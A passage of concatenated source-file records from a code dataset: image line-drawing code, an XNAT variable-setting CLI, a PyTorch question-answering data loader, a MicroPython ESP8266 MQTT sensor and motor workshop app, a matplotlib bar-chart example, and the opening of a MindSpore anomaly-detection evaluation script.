24:\n\t\timg_out[i_c, j_c:imdim[1]] = img_out[i_c, j_c:imdim[1]] + 2\n\tif quadval < 10:\n\t\tfilledvals = np.zeros((xrangeval, 3))\n\t\tm = (i_p-i_c)/(j_p-j_c)\n\t\tb = i_c-m*j_c\n\t\ty = m*x+b\n\t\tfor i in range(xrangeval-1):\n\t\t\tfilledvals[i][0] = int(x[i])\n\t\t\tfilledvals[i][1] = int(np.floor(y[i]))\n\t\t\tfilledvals[i][2] = int(np.floor(y[i+1]))\n\n\t\tfilledvals[xrangeval-1][0] = int(x[xrangeval-1])\n\t\tfilledvals[xrangeval-1][1] = int(np.floor(y[xrangeval-1]))\n\n\t\tif quadval % 2 == 0:\n\t\t\tfilledvals[xrangeval-1][2] = int(np.floor(y[xrangeval-1]))\n\t\telse:\n\t\t\tfilledvals[xrangeval-1][2] = int(i_c)\n\t\t\n\t\tfilledvals[filledvals[:, 1] < 0, 1] = 0\n\t\tfilledvals[filledvals[:, 1] > imdim[1], 1] = int(imdim[1])\n\t\tfilledvals[filledvals[:, 2] < 0, 2] = 0\n\t\tfilledvals[filledvals[:, 2] > imdim[1], 2] = int(imdim[1])\n\t\trrsize = np.shape(filledvals)[0]-1\n\n\t\tif quadval == 1:\n\t\t\tremovedrows = filledvals[:, 1] + filledvals[:, 2] == 0\n\t\t\tif removedrows[0] == True:\n\n\t\t\t\t#zeropos_ = np.where(removedrows == 0)\n\t\t\t\t#zeropos = zeropos_[0][np.shape(zeropos_)[0][0]\n\t\t\t\t#zeropos = np.where(removedrows == 0)[0][0]\n\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[zeropos:xrangeval, :]\n\t\tif quadval == 2:\n\t\t\tremovedrows = (filledvals[:, 1] + filledvals[:, 2] == 0) & (filledvals[:, 1] == 0)\n\t\t\tif removedrows[rrsize] == True:\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[0:zeropos+1, :]\n\t\tif quadval == 3:\n\t\t\tremovedrows = (filledvals[:, 1] - filledvals[:, 2] == 0) & (filledvals[:, 2] == 0)\n\t\t\tif removedrows[rrsize] == True:\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[zeropos:xrangeval, :]\n\t\tif quadval == 4:\n\t\t\tremovedrows = (filledvals[:, 1] - filledvals[:, 2] == 0) & (filledvals[:, 2] == imdim[1])\n\t\t\tif removedrows[rrsize] == True:\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[0:zeropos+1, :]\n\n\n\t\tfor i in range(np.shape(filledvals)[0]):\n\t\t\tfilledvals[i, 1:3] = np.sort(filledvals[i, 1:3])\n\t\t\ta0 = int(filledvals[i][0])\n\t\t\ta1 = int(filledvals[i][1])\n\t\t\ta2 = int(filledvals[i][2])\n\n\t\t\timg_out[a1:a2+1, a0] = img_out[a1:a2+1, a0] + 2\n\n\tif extensionflag == 0:\n\t\tif quadval == 1:\n\t\t\timg_out[:, 0:j_p] = 0\n\t\t\timg_out[0:i_p, :] = 0\n\t\tif quadval == 2:\n\t\t\timg_out[0:i_p, :] = 0\n\t\t\timg_out[:, (j_p+1):imdim[1]] = 0\n\t\tif quadval == 3:\n\t\t\timg_out[(i_p+1):imdim[0], :] = 0\n\t\t\timg_out[:, 0:j_p] = 0\n\t\tif quadval == 4:\n\t\t\timg_out[(i_p+1):imdim[0], :] = 0\n\t\t\timg_out[:, (j_p+1):imdim[1]] = 0\n\t\n\timg_out[i_c,j_c] = 1\n\timg_out[img_out > 0] = 1\n\treturn(img_out)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"build/lib/rootprocessing/RP_linedraw.py","file_name":"RP_linedraw.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"162276095","text":"import sys\nfrom .base import (\n connect, print_response_error, print_usage_error,\n print_info_message, base_parser, add_default_args, set_logger)\nfrom xnatutils.exceptions import XnatUtilsUsageError, XnatUtilsException\nfrom xnat.exceptions import XNATResponseError\n\n\ndef varput(subject_or_session_id, variable, value, **kwargs):\n \"\"\"\n Sets variables (custom or otherwise) of a session or subject in an XNAT instance\n project\n\n User credentials can be stored in a ~/.netrc file so that they don't need\n to be entered each time a command is run. If a new user provided or netrc\n doesn't exist the tool will ask whether to create a ~/.netrc file with the\n given credentials.\n\n Parameters\n ----------\n subject_or_session_id : str\n Name of subject or session to set the variable of\n variable : str\n Name of the variable to set\n value : str\n Value to set the variable to\n user : str\n The user to connect to the server with\n loglevel : str\n The logging level to display. In order of increasing verbosity\n ERROR, WARNING, INFO, DEBUG.\n connection : xnat.Session\n An existing XnatPy session that is to be reused instead of\n creating a new session. The session is wrapped in a dummy class\n that disables the disconnection on exit, to allow the method to\n be nested in a wider connection context (i.e. reuse the same\n connection between commands).\n server : str | int | None\n URI of the XNAT server to connect to. If not provided connect\n will look inside the ~/.netrc file to get a list of saved\n servers. If there is more than one, then they can be selected\n by passing an index corresponding to the order they are listed\n in the .netrc\n use_netrc : bool\n Whether to load and save user credentials from netrc file\n located at $HOME/.netrc\n \"\"\"\n with connect(**kwargs) as login:\n # Get XNAT object to set the field of\n if subject_or_session_id.count('_') == 1:\n xnat_obj = login.subjects[subject_or_session_id]\n elif subject_or_session_id.count('_') >= 2:\n xnat_obj = login.experiments[subject_or_session_id]\n else:\n raise XnatUtilsUsageError(\n \"Invalid ID '{}' for subject or sessions (must contain one \"\n \"underscore for subjects and two underscores for sessions)\"\n .format(subject_or_session_id))\n # Set value\n xnat_obj.fields[variable] = value\n\n\ndescription = \"\"\"\nSets variables (custom or otherwise) of a session or subject in an XNAT instance\nproject\n\nUser credentials can be stored in a ~/.netrc file so that they don't need to be\nentered each time a command is run. If a new user provided or netrc doesn't\nexist the tool will ask whether to create a ~/.netrc file with the given\ncredentials.\n\"\"\"\n\n\ndef parser():\n parser = base_parser(description)\n parser.add_argument('subject_or_session_id', type=str,\n help=(\"Name of subject or session to set the variable \"\n \"of\"))\n parser.add_argument('variable', type=str,\n help=\"Name of the variable to set\")\n parser.add_argument('value', help=\"Value of the variable\")\n add_default_args(parser)\n return parser\n\n\ndef cmd(argv=sys.argv[1:]):\n\n args = parser().parse_args(argv)\n\n set_logger(args.loglevel)\n\n try:\n varput(args.subject_or_session_id, args.variable, args.value,\n user=args.user, server=args.server,\n use_netrc=(not args.no_netrc))\n except XnatUtilsUsageError as e:\n print_usage_error(e)\n except XNATResponseError as e:\n print_response_error(e)\n except XnatUtilsException as e:\n print_info_message(e)\n","sub_path":"xnatutils/varput_.py","file_name":"varput_.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"194977562","text":"# -*- coding:utf-8 -*-\n# Author: Roger\n# Created by Roger on 2017/10/24\nfrom __future__ import absolute_import\nimport codecs\nimport math, random\ntry:\n import simplejson as json\nexcept:\n import json\nimport torch\nfrom torch.autograd import Variable\nfrom layers import Constants, Dictionary\n\n\ndef convert2longtensor(x):\n return torch.LongTensor(x)\n\n\ndef convert2variable(x, device=-1, volatile=True):\n if device >= 0:\n x = x.cuda(device)\n return Variable(x, volatile=volatile)\n\n\nclass Evidence(object):\n def __init__(self, e_key, e_text, e_text_index, e_feature, starts, ends):\n self.e_key = e_key # String\n self.e_text = e_text # list(string)\n self.e_text_index = e_text_index # torch.LongTensor\n self.e_feature = e_feature # torch.LongTensor\n self.starts = starts # list(int)\n self.ends = ends # list(int)\n\n def __iter__(self):\n for d in [self.e_key, self.e_text, self.e_text_index, self.e_feature, self.starts, self.ends]:\n yield d\n\n @staticmethod\n def load_one_evidence(evidence, word_dict, pos_dict, ner_dict):\n e_key = evidence['e_key']\n e_text = evidence[\"evidence_tokens\"]\n\n if 'answer_starts' in evidence:\n if len(evidence['answer_starts']) == 0:\n starts = [-1]\n else:\n starts = evidence['answer_starts']\n else:\n starts = [-1]\n if 'answer_ends' in evidence:\n if len(evidence['answer_ends']) == 0:\n ends = [-1]\n else:\n ends = evidence['answer_ends']\n else:\n ends = [-1]\n\n # if starts[0] == -1 or ends[0] == -1:\n # return None\n\n e_text_index = convert2longtensor(word_dict.convert_to_index(e_text, Constants.UNK_WORD))\n\n e_pos = evidence['evidence_pos']\n e_ner = evidence['evidence_ners']\n e_ner_index = convert2longtensor(ner_dict.convert_to_index(e_ner, Constants.UNK_WORD))\n e_pos_index = convert2longtensor(pos_dict.convert_to_index(e_pos, Constants.UNK_WORD))\n\n qe_feature = torch.FloatTensor(evidence[\"qecomm\"])\n ee_fre = torch.FloatTensor(evidence['fre_tokens'])\n ee_com = torch.FloatTensor(evidence['f_eecomm'])\n dis_edit = torch.FloatTensor(evidence['f_edit_dist'])\n dis_jaccard = torch.FloatTensor(evidence['f_jaccard'])\n qe_feature_c = torch.FloatTensor(evidence['qe_feature_c'])\n ee_fre_c = torch.FloatTensor(evidence['fre_token_c'])\n ee_com_c = torch.FloatTensor(evidence['f_eecomm_c'])\n dis_edit_c = torch.FloatTensor(evidence['f_edit_dist_c'])\n dis_jaccard_c = torch.FloatTensor(evidence['f_jaccard_c'])\n# ee_ratio = torch.FloatTensor(evidence['fre_ratio'])\n e_feature_index = torch.stack([e_text_index, e_pos_index, e_ner_index], dim=1)\n e_feature_float = torch.stack([qe_feature, ee_fre, ee_com, dis_edit, dis_jaccard,\n qe_feature_c, ee_fre_c, ee_com_c, dis_edit_c, dis_jaccard_c], dim=1)\n\n return Evidence(e_key, e_text, e_feature_index, e_feature_float, starts, ends)\n\n @staticmethod\n def batchify(data):\n e_key, e_real_text, e_feature_index, e_feature_float, starts, ends = zip(*data)\n e_feature_index_size = e_feature_index[0].size()[1]\n e_feature_float_size = e_feature_float[0].size()[1]\n\n e_lens = [len(e_real_text[i]) for i in range(len(data))]\n\n max_e_length = max(e_lens)\n e_index = e_feature_index[0].new(len(data), max_e_length, e_feature_index_size).fill_(Constants.PAD)\n e_feature = e_feature_float[0].new(len(data), max_e_length, e_feature_float_size).fill_(Constants.PAD)\n\n for i in range(len(data)):\n length = e_lens[i]\n e_index[i, :, :].narrow(0, 0, length).copy_(e_feature_index[i])\n e_feature[i, :, :].narrow(0, 0, length).copy_(e_feature_float[i])\n\n start_position = convert2longtensor([start[0] for start in starts])\n end_position = convert2longtensor([end[0] for end in ends])\n\n e_lens = convert2longtensor(e_lens)\n\n return e_index, e_feature, e_lens, start_position, end_position, e_key, e_real_text\n\n\nclass Question(object):\n def __init__(self, q_key, q_text, q_text_index, q_feature):\n self.q_key = q_key # String\n self.q_text = q_text # list(string)\n self.q_text_index = q_text_index # torch.LongTensor\n self.q_feature = q_feature # torch.LongTensor\n\n def __iter__(self):\n for d in [self.q_key, self.q_text, self.q_text_index, self.q_feature]:\n yield d\n\n @staticmethod\n def batchify(data):\n q_key, q_real_text, q_text_index, q_featurq_index = zip(*data)\n q_featurq_size = q_featurq_index[0].size()[1]\n\n q_lens = [q_text_index[i].size(0) for i in range(len(data))]\n max_q_length = max(q_lens)\n q_text = q_text_index[0].new(len(data), max_q_length).fill_(Constants.PAD)\n q_feature = q_featurq_index[0].new(len(data), max_q_length, q_featurq_size).fill_(Constants.PAD)\n\n for i in range(len(data)):\n length = q_text_index[i].size(0)\n q_text[i, :].narrow(0, 0, length).copy_(q_text_index[i])\n q_feature[i, :, :].narrow(0, 0, length).copy_(q_featurq_index[i])\n\n q_lens = convert2longtensor(q_lens)\n\n return q_text, q_feature, q_lens, q_key, q_real_text\n\n @staticmethod\n def load_one_question(data, word_dict, pos_dict, ner_dict):\n q_key = data['q_key']\n\n q_text = data[\"question_tokens\"]\n q_text_index = convert2longtensor(word_dict.convert_to_index(q_text, Constants.UNK_WORD))\n\n q_ner = data[\"question_ners\"]\n q_pos = data[\"question_pos\"]\n q_ner_index = convert2longtensor(ner_dict.convert_to_index(q_ner, Constants.UNK_WORD))\n q_pos_index = convert2longtensor(pos_dict.convert_to_index(q_pos, Constants.UNK_WORD))\n q_feature = torch.stack([q_pos_index, q_ner_index], dim=1)\n\n return Question(q_key, q_text, q_text_index, q_feature)\n\n\nclass WebQACorpus(object):\n def __init__(self, filename, batch_size=64, device=-1, volatile=False,\n word_dict=None, ner_dict=None, pos_dict=None):\n if word_dict is None:\n self.word_d, self.pos_dict, self.ner_dict = self.load_word_dictionary(filename)\n else:\n self.word_d = word_dict\n self.ner_dict = ner_dict\n self.pos_dict = pos_dict\n question_dict, evidence_dict, train_pair = self.load_data_file(filename,\n word_dict=self.word_d,\n ner_dict=self.ner_dict,\n pos_dict=self.pos_dict)\n self.question_dict = question_dict # {q_key: [question, [eid]]}\n self.evidence_dict = evidence_dict # {eid: evidence}\n self.data = train_pair # (q_key, eid, [eid_no_answer])\n self.batch_size = batch_size\n self.device = device\n self.volatile = volatile\n\n def __sizeof__(self):\n return len(self.data)\n\n def __len__(self):\n return len(self.data)\n\n def cpu(self):\n self.device = -1\n\n def cuda(self, device=0):\n self.device = device\n\n def set_device(self, device=-1):\n self.device = device\n\n def set_batch_size(self, batch_size=50):\n self.batch_size = batch_size\n\n def _question_evidence(self, question_ids, evidence_ids):\n questions = [self.question_dict[qid][0] for qid in question_ids]\n evidences = [self.evidence_dict[eid] for eid in evidence_ids]\n\n q_text, q_feature, q_lens, q_key, q_real_text = Question.batchify(questions)\n e_text, e_feature, e_lens, start_position, end_position, e_key, e_real_text = Evidence.batchify(evidences)\n\n q_text, q_feature, q_lens = [convert2variable(x, self.device, self.volatile)\n for x in [q_text, q_feature, q_lens]]\n e_text, e_feature, e_lens, start_position, end_position = [convert2variable(x, self.device, self.volatile)\n for x in [e_text, e_feature, e_lens,\n start_position, end_position]]\n\n return q_text, e_text, start_position, end_position, q_lens, e_lens, q_feature, \\\n e_feature, q_key, e_key, q_real_text, e_real_text\n\n def next_batch(self, ranking=False, shuffle=True):\n num_batch = int(math.ceil(len(self.data) / float(self.batch_size)))\n\n if not shuffle:\n data = self.data\n random_indexs = torch.range(0, num_batch - 1)\n else:\n data = [self.data[index] for index in torch.randperm(len(self.data))]\n random_indexs = torch.randperm(num_batch)\n\n for index, i in enumerate(random_indexs):\n start, end = i * self.batch_size, (i + 1) * self.batch_size\n data_tmp = data[start:end]\n batch_qid, batch_eid, batch_negs = zip(*data_tmp)\n\n if ranking:\n batch_qid = list(batch_qid) * 2\n batch_eid = list(batch_eid)\n for negs in batch_negs:\n neg = random.choice(negs)\n batch_eid.append(neg)\n\n _batch_size = len(batch_qid)\n batch_data = self._question_evidence(batch_qid, batch_eid)\n\n q_text, e_text, start_position, end_position = batch_data[:4]\n q_lens, e_lens, q_feature, e_feature = batch_data[4:8]\n q_keys, e_keys = batch_data[8:10]\n\n yield vars(Batch(q_text, e_text, start_position, end_position,\n q_lens, e_lens, q_feature, e_feature,\n _batch_size, q_keys, e_keys))\n\n def next_question(self):\n\n for qid in self.question_dict.keys():\n _, evidence_ids = self.question_dict[qid]\n _batch_size = len(evidence_ids)\n\n if _batch_size == 0:\n continue\n\n batch_data = self._question_evidence([qid] * _batch_size, evidence_ids)\n q_text, e_text, start_position, end_position = batch_data[:4]\n q_lens, e_lens, q_feature, e_feature = batch_data[4:8]\n q_keys, e_keys, q_real_text, e_real_text = batch_data[8:]\n yield BatchQuestion(q_text, e_text, start_position, end_position,\n q_lens, e_lens, q_feature, e_feature,\n _batch_size, q_keys, e_keys, e_real_text, q_real_text[0])\n\n @staticmethod\n def load_one_line_json(line, word_dict, pos_dict, ner_dict):\n data = json.loads(line)\n\n question = Question.load_one_question(data, word_dict, pos_dict, ner_dict)\n\n evidences = list()\n\n for evidence in data[\"evidences\"]:\n\n evidence_data = Evidence.load_one_evidence(evidence, word_dict, pos_dict, ner_dict)\n\n if evidence_data is None:\n continue\n\n evidences.append(evidence_data)\n\n return question, evidences\n\n @staticmethod\n def load_data_file(filename, word_dict, pos_dict, ner_dict):\n question_dict = dict()\n evidence_dict = dict()\n train_pair = list()\n count = 0\n with codecs.open(filename, 'r', 'utf8') as fin:\n\n for line in fin:\n count += 1\n\n question, evidences = WebQACorpus.load_one_line_json(line, word_dict, pos_dict, ner_dict)\n\n all_evidence = []\n no_answer = []\n has_answer = []\n for e in evidences:\n eid = \"%s||%s\" % (question.q_key, e.e_key)\n evidence_dict[eid] = e\n all_evidence.append(eid)\n\n if e.starts[0] == -1 or e.ends[0] == -1:\n no_answer.append(eid)\n else:\n has_answer.append(eid)\n\n question_dict[question.q_key] = [question, all_evidence]\n\n if count % 5000 == 0:\n print(count)\n\n if not no_answer:\n no_answer = [random.choice(list(evidence_dict.keys()))]\n if not no_answer:\n continue\n for e in has_answer:\n train_pair.append((question.q_key, e, no_answer))\n\n\n print('load data from %s, get %s qe pairs. ' %(filename, len(train_pair)))\n\n return question_dict, evidence_dict, train_pair\n\n @staticmethod\n def load_word_dictionary(filename, word_dict=None, pos_dict=None, ner_dict=None):\n if word_dict is None:\n word_dict = Dictionary()\n word_dict.add_specials([Constants.PAD_WORD, Constants.UNK_WORD, Constants.BOS_WORD, Constants.EOS_WORD],\n [Constants.PAD, Constants.UNK, Constants.BOS, Constants.EOS])\n if pos_dict is None:\n pos_dict = Dictionary()\n pos_dict.add_specials([Constants.PAD_WORD, Constants.UNK_WORD],\n [Constants.PAD, Constants.UNK])\n if ner_dict is None:\n ner_dict = Dictionary()\n ner_dict.add_specials([Constants.PAD_WORD, Constants.UNK_WORD],\n [Constants.PAD, Constants.UNK])\n with codecs.open(filename, 'r') as fin:\n for line in fin:\n data = json.loads(line)\n for token in data[\"question_tokens\"]:\n word_dict.add(token)\n for pos in data['question_pos']:\n pos_dict.add(pos)\n for ner in data['question_ners']:\n ner_dict.add(ner)\n for evidence in data[\"evidences\"]:\n for token in evidence[\"evidence_tokens\"]:\n word_dict.add(token)\n for pos in evidence['evidence_pos']:\n pos_dict.add(pos)\n for ner in evidence['evidence_ners']:\n ner_dict.add(ner)\n\n return word_dict, pos_dict, ner_dict\n\n @staticmethod\n def load_pos_dictionary():\n return Dictionary()\n\n @staticmethod\n def load_ner_dictionary():\n return Dictionary()\n\n\nclass Batch(object):\n def __init__(self, q_text, e_text, start, end,\n q_lens, e_lens, q_feature, e_feature,\n batch_size, q_keys, e_keys):\n self.q_text = q_text\n self.e_text = e_text\n self.start_position = start\n self.end_position = end\n self.q_lens = q_lens\n self.e_lens = e_lens\n self.q_feature = q_feature\n self.e_feature = e_feature\n self.batch_size = batch_size\n self.pred = None\n self.q_keys = q_keys\n self.e_keys = e_keys\n\n\nclass BatchQuestion(object):\n def __init__(self, q_text, e_text, start, end,\n q_lens, e_lens, q_feature, e_feature,\n batch_size, q_keys, e_keys,\n evidence_raw_text=None, question_raw_text=None):\n self.q_text = q_text\n self.e_text = e_text\n self.start_position = start\n self.end_position = end\n self.q_lens = q_lens\n self.e_lens = e_lens\n self.q_feature = q_feature\n self.e_feature = e_feature\n self.batch_size = batch_size\n self.pred = None\n self.q_keys = q_keys\n self.e_keys = e_keys\n self.evidence_raw_text = evidence_raw_text\n self.question_raw_text = question_raw_text\n\n\ndef test():\n corpus = WebQACorpus(\"data/baidu_data.json\")\n for data in corpus.next_question():\n for index, (start, end, leng) in enumerate(torch.cat([data.start_position.unsqueeze(-1),\n data.end_position.unsqueeze(-1),\n data.e_lens.unsqueeze(-1)],\n 1)):\n print(''.join(data.evidence_raw_text[index][start.data[0]:end.data[0] + 1]))\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":16261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"76788454","text":"import machine\nimport utime\nimport onewire\nimport ds18x20\nimport network\nfrom umqtt.simple import MQTTClient\nimport sh1106 # https://github.com/plugowski/micropython-utils\nimport time\n\nSUBSCRIBED_TOPICS = (b'test_topic',\n b'predkosc',\n b'turbo',\n b'start')\nPWM_PIN = 14 # D5\nONE_WIRE_PIN = 12 # D6\nI2C_SCL_PIN = 5 # D1\nI2C_SDA_PIN = 4 # D2\nSAFE_RATIO = 0.6\nLOWEST_DUTY_CYCLE = 5\n\nBROKER_IP = '192.168.1.3'\nSTATION_ID = b'1'\nNETWORK_SSID = 'warsztaty_IoT'\nNETWORK_PASSWORD = 'warsztaty'\n\n\nclass IoTApp:\n def __init__(self):\n IoTApp.connect_to_network(NETWORK_SSID, NETWORK_PASSWORD)\n self.pwm = PwmHandler(PWM_PIN)\n self.pwm.pwm.duty(0)\n self.main_topic = b'warsztaty/stanowisko' + STATION_ID + b'/'\n self.mqtt_client = self.connect_to_mqtt_borker()\n self.temp_handler = TempHandler(ONE_WIRE_PIN)\n self.i2c_interface = machine.I2C(scl=machine.Pin(I2C_SCL_PIN), sda=machine.Pin(I2C_SDA_PIN))\n self.light_sensor = LightSensor(self.i2c_interface)\n self.light_sensor_value = self.light_sensor.read_value()\n self.oled = self.init_oled_display(self.i2c_interface)\n self.current_temp = self.temp_handler.read_temp()\n self.start_esp = False\n\n def mqtt_msg_callback(self, topic, message):\n if self.start_esp:\n if topic == self.main_topic + SUBSCRIBED_TOPICS[1]:\n response = self.pwm.duty_cycle_handler(message)\n if response['error']:\n self.mqtt_client.publish(self.mqtt_client.error_topic, response['message'])\n elif topic == self.main_topic + SUBSCRIBED_TOPICS[2]:\n response = self.pwm.turbo_mode_handler(message)\n if response['error']:\n self.mqtt_client.publish(self.mqtt_client.error_topic, response['message'])\n if topic == self.main_topic + SUBSCRIBED_TOPICS[3]:\n if message.decode().upper() == 'START':\n self.start_esp = True\n elif message.decode().upper() == 'STOP':\n self.start_esp = False\n self.pwm.pwm.duty(0)\n else:\n self.mqtt_client.publish(self.mqtt_client.error_topic, 'Aby wystartowac wyslij wiadomosc: start')\n elif topic == self.main_topic + SUBSCRIBED_TOPICS[0]:\n print('test topic message received: ' + str(message))\n\n def turn_on(self):\n while True:\n self.mqtt_client.check_msg()\n utime.sleep_ms(1000)\n if self.start_esp:\n self.current_temp = self.temp_handler.read_temp()\n self.light_sensor_value = self.light_sensor.read_value()\n self.mqtt_client.publish(self.mqtt_client.temp_topic, self.current_temp)\n self.refresh_oled()\n self.mqtt_client.publish(self.mqtt_client.light_topic, self.light_sensor_value)\n else:\n self.oled.fill(0)\n self.oled.text('STANOWISKO: ' + STATION_ID.decode(), 0, 0)\n self.oled.text('Oczekiwanie', 0, 36)\n self.oled.text('na start', 0, 48)\n self.oled.show()\n\n def refresh_oled(self):\n self.oled.fill(0)\n self.oled.show()\n self.oled.text('STANOWISKO: ' + STATION_ID.decode(), 0, 0)\n self.oled.text('temp: ' + self.current_temp.decode(), 0, 12)\n self.oled.text('predkosc: ' + str(self.pwm.duty_cycle), 0, 24)\n self.oled.text('light: ' + str(self.light_sensor_value), 0, 36)\n self.oled.show()\n\n def connect_to_mqtt_borker(self):\n mqtt_client = MQTTClient(client_id='esp8266_' + str(STATION_ID), server=BROKER_IP, port=1883)\n check = False\n while not check:\n try:\n mqtt_client.connect()\n check = True\n except Exception:\n print(b\"It is impossible to get connection to MQTT broker, please check it!\")\n utime.sleep_ms(20000)\n mqtt_client.set_callback(self.mqtt_msg_callback)\n for topic in (self.main_topic + topic for topic in SUBSCRIBED_TOPICS):\n mqtt_client.subscribe(topic)\n print(b'topic subscribed: ' + topic)\n mqtt_client.error_topic = self.main_topic + b'blad'\n mqtt_client.temp_topic = self.main_topic + b'temp'\n mqtt_client.light_topic = self.main_topic + b'czujnik_swiatla'\n return mqtt_client\n\n @staticmethod\n def connect_to_network(ssid, password):\n interface = network.WLAN(network.STA_IF)\n if not interface.isconnected():\n print('connecting to network ongoing...')\n interface.active(True)\n interface.connect(ssid, password)\n while not interface.isconnected():\n pass\n print('connection established')\n print('network config: ', interface.ifconfig())\n\n @staticmethod\n def init_oled_display(i2c_interface):\n print('OLED display initialization...')\n display = sh1106.SH1106_I2C(128, 64, i2c_interface)\n display.fill(0)\n display.show()\n display.text('Display OK', 20, 30)\n display.show()\n return display\n\n\nclass PwmHandler:\n def __init__(self, pwm_pin):\n self.turbo_mode = False\n self.pwm = machine.PWM(machine.Pin(pwm_pin))\n self.pwm.freq(100)\n self.pwm.duty(0)\n self.duty_cycle = 0\n\n def rescale_duty_cycle(self, duty_cycle, rescale=True):\n if not rescale:\n duty_cycle = ((self.duty_cycle - LOWEST_DUTY_CYCLE) * 100)/(100-LOWEST_DUTY_CYCLE)\n if self.turbo_mode:\n duty_cycle = int((duty_cycle * (100-LOWEST_DUTY_CYCLE) / 100) + LOWEST_DUTY_CYCLE)\n else:\n duty_cycle = int(((duty_cycle * (100-LOWEST_DUTY_CYCLE) / 100) + LOWEST_DUTY_CYCLE) * SAFE_RATIO)\n\n self.duty_cycle = duty_cycle\n print('Setting new duty cycle value: {duty_cycle}'.format(\n duty_cycle=duty_cycle\n ))\n self.pwm.duty(PwmHandler.duty_cycle_percent_to_10bit_value(duty_cycle))\n self.duty_cycle = duty_cycle\n\n def duty_cycle_handler(self, message):\n response = {'error': False, 'message': ''}\n try:\n raw_duty_cycle = int(message.decode())\n except Exception:\n response['error'] = True\n response['message'] = b'Bledny format mocy silnika, obsluguje tylko wartosci 0-100, otrzymano: ' + message\n print(response['message'])\n return response\n if raw_duty_cycle>100 or raw_duty_cycle<0:\n response['error'] = True\n response['message'] = b'Bledny format mocy silnika, obsluguje tylko wartosci 0-100 otrzymano: ' + message\n return response\n self.rescale_duty_cycle(raw_duty_cycle)\n return response\n\n def turbo_mode_handler(self, message):\n response = {'error': False, 'message': ''}\n if message.upper() == b'TAK':\n self.turbo_mode = True\n print('Turbo mode turned on')\n elif message.upper() == b'NIE':\n self.turbo_mode = False\n print('Turbo mode turned off')\n else:\n response['error'] = True\n response['message'] = b'Zla wartosc, tryb turbo przyjmuje wartosci: tak lub nie'\n print(response['message'])\n self.rescale_duty_cycle(self.duty_cycle, False)\n return response\n\n @staticmethod\n def duty_cycle_percent_to_10bit_value(duty_cycle):\n return int(round(1023 * duty_cycle / 100))\n\n\nclass TempHandler:\n def __init__(self, one_wire_pin):\n self.temp_sensor = self.init_temperature_sensor(one_wire_pin)\n self.message = self.read_temp()\n\n def init_temperature_sensor(self, pin):\n print('temperature sensor initialization...')\n onewire_pin = machine.Pin(pin)\n check = False\n while not check:\n try:\n sensor = ds18x20.DS18X20(onewire.OneWire(onewire_pin))\n check = True\n except Exception:\n print('Problem with sensor initialization, check connection!')\n time.sleep(2)\n return sensor\n\n def read_temp(self):\n print(b'temperature reading...')\n roms = self.temp_sensor.scan()\n self.temp_sensor.convert_temp()\n utime.sleep_ms(750)\n temp = str(round(self.temp_sensor.read_temp(roms[0]), 2)).encode()\n print(b'current temperature: ' + temp)\n return temp\n\n\nclass LightSensor:\n def __init__(self, i2c_interface):\n self.i2c = i2c_interface\n self.init_light_sensor()\n\n def init_light_sensor(self):\n check = False\n while not check:\n try:\n print(b'light sensor initialization...')\n CONTINOUS_HRES1 = 0x10\n mode = CONTINOUS_HRES1\n i2c_addr=0x23\n self.i2c.writeto(i2c_addr, b\"\\x00\")\n self.i2c.writeto(i2c_addr, b\"\\x01\")\n self.i2c.writeto(i2c_addr, bytes([mode]))\n utime.sleep_ms(180)\n check = True\n except Exception:\n print(b'Problem with light sensor initialization!!!, check it!')\n\n def read_value(self):\n measure_value = self.i2c.readfrom(0x23, 2)\n lux = ((measure_value[0] << 8) | measure_value[1])/1.2\n print('Light = {0}lux'.format(lux))\n return str(round(lux, 2))\n\n\niot_app = IoTApp()\niot_app.turn_on()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"221808159","text":"import matplotlib.pyplot as plt \r\nimport numpy as np\r\n\r\n# Sample Data\r\ndata = {\r\n\t'Item A' : 19438,\r\n\t'Item B' : 19352,\r\n\t'Item C' : 11641,\r\n\t'Item D' : 19414,\r\n\t'Item E' : 13219,\r\n\t'Item F' : 16518,\r\n\t'Item G' : 13161,\r\n\t'Item H' : 19641,\r\n\t'Item I' : 19196,\r\n\t'Item J' : 13512,\r\n}\r\nitem = tuple(data.keys())\r\ncount = tuple(data.values())\r\n\r\n# Simple Plot\r\nfig, ax = plt.subplots()\r\nax.barh(item, count)\r\n\r\n# Pengaturan Style \r\nplt.style.use('seaborn')\r\n\r\n# Penambahan Garis (V/H)\r\nax.axvline(np.mean(count), ls='--', color='red')\r\n# ls = line style\r\n\r\nplt.show()","sub_path":"16-Plot-Lifecycle/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347056514","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n'''eval dataset with SGAE model'''\nimport os\nimport time\nimport numpy as np\nfrom sklearn.metrics import average_precision_score, roc_auc_score\nimport pandas as pd\nfrom tqdm import tqdm\nfrom src.SGAE import SGAE\nfrom dataloader import LoadDocumentData, LoadImageData, LoadTabularData\nimport mindspore as ms\nfrom mindspore import nn\nfrom mindspore import Model\nfrom mindspore import 